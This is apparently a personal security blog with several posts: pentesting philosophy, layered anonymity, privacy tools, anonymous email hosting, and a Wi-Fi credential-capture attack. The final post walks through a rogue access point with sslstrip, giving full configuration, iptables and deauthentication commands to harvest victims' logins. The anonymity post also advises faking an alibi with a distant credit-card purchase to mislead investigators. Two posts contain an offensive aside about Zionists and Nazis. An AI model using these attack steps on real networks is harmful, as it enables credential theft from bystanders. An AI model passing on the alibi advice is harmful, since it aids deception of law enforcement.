Two Types of Penetration Testers


There are two types of penetration testers in the industry.

Those who identify risk and vulnerabilities beyond a simple Nexpose/Nessus/Qualys scan. And those who want to “win”.

The job of the “winner” is to get DA on their client’s network. Great! But once they’ve gotten it, they show off. Look how much information I can get with the DA account! I can get access to these databases and these spreadsheets. Sensitive Information! Be afraid! I pwned you noobs!!!

The other type of penetration tester also seeks DA. He finds it. Great! Now he moves on to another vulnerability. And then another. Can I get DA another way? Maybe? Okay, what else is exploitable here. Along the way if he finds sensitive information, he presents it to the client. But his job is not focused on presenting information, its on finding avenues to find information.

If the “winner” focuses on one issue. He writes his report and presents it to the client. The client is enamored, impressed, even afraid. But if another “winner” penetration tester were to come in tomorrow, because the first only focused on one issue, the second would just find another avenue. A third might find a third issue. Until they are merely playing wack-a-mole.

The second type reports the issues he identified, an array of vulnerabilities, ranked by severity. He may briefly present information he was able to access, but then moves on. His job is to work towards resolution, not playing hacker. Overall security is enhanced.

Thoughts? No? I didn’t think so, no one reads this blog.

Advertisements

Strong Anonymity on the Internet


How can you be anonymous on the Internet? I mean strong anonymity. So anonymous even the world’s best hackers could not identify you without spending perhaps hundreds of thousands of dollars in investigation expenses or they controlled half the Internet?

Its simple, but would take some time. In short, there’s a layered approach, or as its commonly referred to, defense in depth.

  1. Get Bitcoin in person with CashNOT a credit card online!
  2. Purchase a VPN with Bitcoin. Obviously verify that it has good security practices, non-logging, etc. I would recommend one outside of the US.
  3. Go to a public Wifi Hotspot, such as a coffee shop, during crowded business hours. Do not purchase anything while there.
  4. Change your MAC address prior to connecting to the Wifi network. Throw them off by changing it to the MAC address of, say, Apple if you’re using a Dell or a Motorolla cell phone if you’re using a Gateway. Be creative.
  5. Once online, connect to your VPN in a Virtual Machine – not directly from the base machine.
  6. Connect to Tor.
  7. Over Tor, find and connect to an exposed or public proxy server. You can do this over Proxychains.
  8. Finally….Connect to your site of choice…

Each layer has a specific and relevant function, protecting you in layers, each of which is quite formidable by itself. Lets work backwards…

Explanation:

The throw-away public proxy allows you to pick the country of origin that the exposed public-site sees. There are two assumptions. First, that its already compromised, monitored and bugged. Second, that others besides you are using it, so the actual source connecting to any particular site is hard to verify without logging every connection. If you target is in the US and the proxy is in China, the cyber-war between the two keeps you safe.

Tor is Tor. Enough said there. I will say, however, that with enough resources and time, it is possible for a government or extremely wealthy organization to control the Tor network. One can only hope that numerous organizations and governments attempt to do this, canceling out each other’s efforts. Having said that, unless you’re doing something truly horrible for prolonged periods of time, its unlikely that law enforcement will waste their potential ability to break Tor on you. But if they did…

The VPN anonymizes you in the event that Tor is ever compromised. Given that multiple users are likely running Tor, VPN connectivity over a widely used node is crucial. At this point if someone has gotten this far, I would be concerned. Very concerned. But your VPN account was itself purchased through untraceable means, so law enforcement cannot simply look at purchase histories and logs. That should help you sleep at night. But hypothetically if they did…

Your next layer is the public hotspots. They are widely used and extremely transient. Your spoofed MAC should conceal your laptop model and the fact that you didn’t purchase anything will afford you a final layer of plausible deniability – “Why would I show up somewhere and not purchase anything?” – As I write this, it occurs to me that it might also be useful to arrange for something to be purchased half-way across town with your credit card so you have a receipt “proving” you were elsewhere. Why not?

Yes, its still traceable…

Some will read this and say “Yes, yes, but technically speaking, with enough time, money and dedication even this can be traced.” Well…yes…but consider the financial and political costs involved. Unless you’re doing something truly terrible or really offensive to a government, they’ll call it “untraceable” after step 2.

Thoughts?

Four Simple Technologies for Privacy We Should All Know


This recently PRISM scandal has made me concerned about security and privacy, even more than before. I truly do not think that the government is spying on me as an individual and will (hopefully) never kick down my doors and take me to the Ministry of Luv. I have nothing to hide. But that’s not the point. Its the principle. You have no right, neither moral nor practical, to monitor my communication. In fact, we have explicit rights protecting us!

But in the wake of the PRISM scandal, we now know with certainty that the government is actively monitoring everyone. Therefore, I would like to impart my knowledge of encryption to the public. Here are four simple ways to keep yourself safe from the government.

A) Pretty Good Privacy (PGP) – This is a widely used, tried and tested method of encrypting text and files prior to sending them to the end user. Because all encryption is done prior to the connection, this is one of the better systems out there.

Here’s how it works: You exchange public keys with whoever you want to communicate with. When you want to send the other person a message, you encrypt the data his public key (not your own). The end-user will decrypt the data with his private key (not yours). Conversely, if someone wants to send you a message, he will encrypt the message with your public key and you will then decrypt it with your (not his) private key.

If that’s confusing, think of it like giving people a lock-box that they can put contents in and lock and no one can unlock it but you. That lock-box is your public key. The key to the lock-box is your private key.

So, a few drawbacks to this method:

  • PGP’s major drawback is that without an infrastructure, anyone can create a fake public key in your name and send it around in your name. Then, he can intercept messages to you, decrypt them, modify them if desired, and send them back to you using your actual public key, and no one would be the wiser. Its a bit complicated, but entirely possible.
    • You easily can get around that by creating a “web of trust”, but it involves a bit more work.
    • You can create an infrastructure for PGP if you want. MIT hosts their famous key server, but there are several infrastructural problems with it.
  • Lets be real, its not 100% user-friendly or intuitive. Mailvelope is the best attempt I have seen to make it more user-friendly and I personally use it when not on Linux.
  • It is feasible that the NSA has the CPU and GPU power to brute-force a low-bit key.

If you are concerned about having your keys broken into, you can try using;

$ gpg --batch --gen-key << EOF
> Key-Type: RSA
> Key-Length: 8192
> Key-Usage: Auth
> Name-Email: [Your email here]
> Name-Comment: [Some comment]
> EOF

B) Tor, The Onion Protocol – The Tor protocol is a method of obscuring the originating source of a network connection. Tor accomplishes this by bouncing connections off of servers around the world. Each computer you bounce your connection off of knows the previous source and next destination, but does not know the two connections prior or two after. And given that all data through the network is encrypted, no one is able to meaningfully modify the intended next sources. After a number of hops, a final end-point will initiate the actual connection to the intended destination. That final destination perceives the end-point as the source of the connection, but does not know the original source.

Tor is largely used for anonymous web-surfing, but because it functions as a SOCKS5 proxy, it can be used for just about anything!

Another innovation of Tor is Hidden Services. In the aforementioned configuration, the client knows who the server is, but the server does not know who the client is. A Hidden Service is when a server hides its identity, but the client is still able to connect to it. The mechanisms are too complex to explain here, but you can read them on the Tor website.

You can download Tor here.

C) Bitcoin – Bitcoin is an operational electronic currency that are independent of any government. It offers security, anonymity, and is accepted by thousands of people worldwide.

Anonymity – User accounts, called Bitcoin addresses or simply addresses,  appear as 27-34 arbitrary numbers and letters such as 31uEbMgunupShBVTewXjtqbBv5MndwfXhb. In reality, addresses are the equivalent of public keys that are used by payers to sign transactions. Address are completely independent of names, addresses, numbers or any other identifying information. The user has control over them by having the corresponding private key, which again, does not have any associated identifying information.That’s more anonymous than a Swiss bank account!

Secure – Bitcoin uses the robust public-private key infrastructure to secure encryption between bitcoin sender and receiver. The sender of bitcoin (payer) obtains the receiver’s bitcoin address and digitally signs his bitcoins to the receiver. This makes electronic theft done by utilizing the Bitcoin system next to impossible.

The Bitcoin infrastructure has several components. Therefore, if you’re interested, I suggest you watch the following video. Its a bit dated, but n

D) Disk Encryption – Disk Encryption is when data is encrypted while it is stored on your hard-drive.

If someone were to obtain physical access to your machine, either through theft or government seizure (same thing?), they would be able to access everything on your machine, including services and systems you were currently logged in on such as Gmail or Facebook. Disk Encryption is a method of preventing the bad guys from accessing your machine. There are dozens of types of disk encryption. Before I talk about the exact implementations, I want you to understand the concept.

Disk Encryption means that everything on your computer is encrypted, rather than encrypting individual files one by one. However, files are only encrypted when they reside on the hard-drive. So, if you email out a file, it will not be encrypted during transmission. For that, you will need to use PGP or a related technology.

Windows has two main tools, the first is Microsoft Full Disk Encryption. However, this service is proprietary and will require you to have Windows Professional. A free alternative is TrueCrypt, which functions in a similar manor.

One note about disk encryption tools: It is more than theoretically possible to recover the hard-drive encryption keys from the memory. It requires the attacker to literally freeze the RAM with a cooling agent, soft-reboot the machine, then boot into a custom system that performs a RAM-dump via Firewire — I have personally seen this done, it is not just theory.

Conclusion and Comments

The aforementioned technologies are, to the best of my knowledge, technically secure against even to the most sophisticated attackers. However, there is one major weak link in this chain: the end-user. Many times, users make simple mistakes which allow attackers to circumvent the entire protective scheme.

For example, PGP and Disk Encryption ultimately require a password to protect the encryption, in the event that the attacker is able to gain physical access to the hard-drive or private keys. If your password is weak, such as being under 20 characters, your data is liable for decryption.

In the future, I hope that all of these technologies become more easy to use and user-friendly.

The only exception I can think of is if the computing power of the NSA is strong enough to break any of these mechanisms. That’s entirely possible. And violence trumps even that — put a gun to the head of even the most rabid Zionist and I’ll give anyone want they want to save his life.

That aside…happy encrypting!

Securing Email from PRISM


Well, sorta. This solution makes acquiring your stored emails a very difficult endeavour. This objective is to provide defense-in-depth security for email data at rest that is seamless to the causal email user. And while anyone with a gun can ultimately track your data (put a gun to the head of the most rabid Zionist and I would tell you anything you want to know to save even his Nazi life), this should make it prohibitively difficult and expensive to do so.

This method rests on two main components:

  1. Making the location of stored email difficult or prohibitively expensive to identify;
  2. Making stored email impossible to hostiley recover.

First, you obviously need an internet accessible SMTP server. Merely opening port 25 on your home connection would make tracking you down a trivial process. A better option is to purchase a VPS in a foreign country, either through Bitcoin or a pre-paid debit card. It goes without that you should never connect to the VPS directly. Always use a variety of layers of obfuscation. I personally prefer a public Wifi location, with Tor and finally a proxy running in a less-than-friendly foreign country. The domain name you purchase, again anonymously, needs to have the SMTP server pointing to VPS you purchased. This server will function only receive emails. It does not store them whatsoever.

Next you need to store the email in a format that is difficult to trace. My personal method is to setup Linux to use a hard-drive with full-disk encryption. Recovering hard-disk private keys from memory is not easy, but I have personally seen it done. So, we’re going to add in another layer of frustration by using a non-standard processor format such as ARM. Though it is still technically possible to recover keys from memory on an ARM processor, most memory-dumping software solutions are for x86 CPUs. My ideal setup would be to use a Raspberry PI because it runs on less power and is more likely to erase quicker. The size will also make concealment a ton easier.

These two machines need to communicate. My preferred method is over Tor. Configure a Tor hidden service on the second machine. Then, configure the VPS to network spool its mail through Tor to the storage machine. I have heard some clamour that Tor can theoretically be traced, but I have yet to find a technical paper detailing exactly the method. Either way, providing another layer of SSL-based encryption is recommended to at least ensure data integrity and confidentiality.

Now email is received by the anonymous VPS, and anonymously routed to your encrypted hard-drive. In order to request the email of whoever@domain.com, the government would have to know who owns domain.com’s SMTP server, get access to that server, then identify where email is stored, and break the encryption on the hard-drive without the key. I hope you’re not doing anything that would tempt them to spend that much time and energy!

Obvious Drawback

Email-in-transit is just about impossible to truly secure. Whoever owns the pipe owns the data. Yes, I could just use SMTP encryption, and you damn well should, but I cannot verify anyone’s identity except through the use of public certificate authorities. But I also have no illusions that the NSA could easily ask VeriSign to issue them forged certificates and VeriSign would immediately comply. I could always create my own certificates, but most SMTP servers would simply not send to questionable recipients without having to manually installing the certificates. And at that point, you’re not seamless to the user and might as well just use PGP.

So if you’re concerned about data-in-transit, yes PGP is your best bet. I don’t know the benchmarks for trying to brute-force PGP on an array of GPUs, but its entirely possible to use 8192-bit PGP keys. Too bad there are few to no easy to use PGP software packages out there.

Hotspot Hijacking & Password Capturing


Unless you know enough about security to know what’s going on behind the scenes, Wifi is beyond insecure. Even with SSL as an attempt to secure a web connection, your connection is still fundamentally insecure. This is an explanation of how someone would capture passwords and other variables sent over an SSL connection that uses Wifi. In essence, its a Man in the Middle (MiM) attack over Wifi that modifies the victim’s HTTP connection and thus gathers GET and POST variables. I was not the first to create it, but I independently thought of it and then combined a few techniques together.

Here’s how it works:

Lets say you go to a Starbucks and they offer an open Wifi connection. Suppose the AP name is attwifi. First, the attacker connects his computer to the legitimate AP so that he can go online. The attacker can use a separate means to get online, I just find this most convenient.

Using a second wifi card that can go into Master mode, set the IP address to something the legitimate Wifi network does not use. No one uses 172.16.1.0/24, so when I was testing this I used that. Since the attacker’s machine will balance between the legitimate AP and fake AP, it needs to be able to distinguish between the two and prevent collisions. So 172.16.1.1 works great.

ifconfig wlan0 172.16.1.1
ifconfig wlan0 up

Then, the attacker must configure dhcpd, in my case, located in /etc/dhcp/dhcpd.conf:

subnet 172.16.1.0 netmask
	255.255.255.0 {
	range 172.16.1.2 172.16.1.254;
	option domain-name-server 172.16.1.1;
	option routers 172.16.1.1;
}

On the second wifi card the attacker must then create an AP by the same name as the legitimate AP. Most public APs are Open networks without any encryption or anything. But even if they weren’t open, the host would likely just give you the password upon request. To create an open network, the attacker must set the following settings in /etc/hostapd/hostapd.conf:

interface=wlan0
driver=nl80211
ssid=attwifi
hw_mode=g
channel=11

Finally, start to turn stuff on. First, the layer 3 routing and NAT rules:

echo 1 > /proc/net/ipv4/ip_forward # Allows routing
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Turns on NAT
iptables -A FORWARD -j ACCEPT # Accepts everything

Then turn on dhcpd:

dhcpd

Then I start broadcasting the Access Point:

hostapd /etc/hostapd/hostapd.conf

At this point, anyone who connects to attwifi will either connect to the attacker, or the authentic AP. As of now it makes no difference who they connect through. If they connect through the attacker’s AP, they will just be forwarded through the real attwifi AP anyways with a unnoticed extra hop.

Up to this point you’ve simply done a Man in the Middle (MiM). The final step is where the magic lays. The attacker must redirect connects to port 80 through sslstrip, a tool that intercepts a victim’s web requests, and removes all references of SSL (ie, changes ‘https’ to ‘http’) and logs all relevant variables that are passed over. For the record and so that I don’t come across as a complete script kiddie, I wrote a tool similar to sslstrip, but sslstrip is significantly better and cleaner written.

The attacker would do this:

iptables -t nat -A PREROUTING -p tcp -s 172.16.1.0/24 --dport 80 -j DNAT --to-destination 172.16.1.1:31337
python ./sslstrip.py -w attwifi.log -l 31337

At this point, the attacker’s machine will be logging GET and POST variables directed through his machine, even if the connection was intended to be secured with SSL. The only sign the victim may notice is that his usually SSL-encrypted connection is no longer secure. A savvy user might notice this, but the vast majority will not. In fact, the way most sites are written, such as Facebook, you enter your credentials onto an initial insecure page! While the form‘s GET or POST target is secure, the page you received is certainly not. Unless he checks the initial page’s code, he would never know that his connection is being tampered with.

There’s one final optional step. A client might be connected to the correct AP for hours without any reason to disconnect. With Windows, if there are multiple APs by the same name and the user is experiencing connection issues on one, Windows will automatically switch to the other AP. You can break a user’s connection and force him to connect through you using the following command:

aireplay-ng -0 0 -a 00:AA:BB:CC:DD:EE -c 01:12:34:56:78:9A ath0

Where 00:AA:BB:CC:DD:EE is the access point and 01:12:34:56:78:9A is a client. This last step is particularly insidious.

The fundamental issue here is not a weakness in SSL, but in Wifi that allows for an easy MiM. However, there are some steps a web site can take to help fix the problem:

  1. Require users to go to https://www.site.com instead of http://www.site.com. A simple redirection or link will not do, as sslstrip and similar programs can capture the redirection-attempt.
  2. Javascript code that does client-side verification to scan for for page modifications
  3. Two-factor authentication, such as an RSA token. While this will not stop the attacker from capturing your variables, it makes re-authentication as the victim impossible. Also a great solution, but won’t prevent against data leakage.
  4. Have the user click a link that requests login. Once at the new page, have an image pointing up at the URL bar and asking the user to verify if SSL is being used. But, this requires too much user-verification.
  5. Change the port from 80 to 8080, or so, thus temporarily thwarting the iptables rule. But obviously a broader or more focused iptables rule would counter-thwart that.

Your thoughts…?

I doubt I have to legally add a disclaimer, but I’ll do it anyways… don’t do anything illegal! You are responsible for your own actions!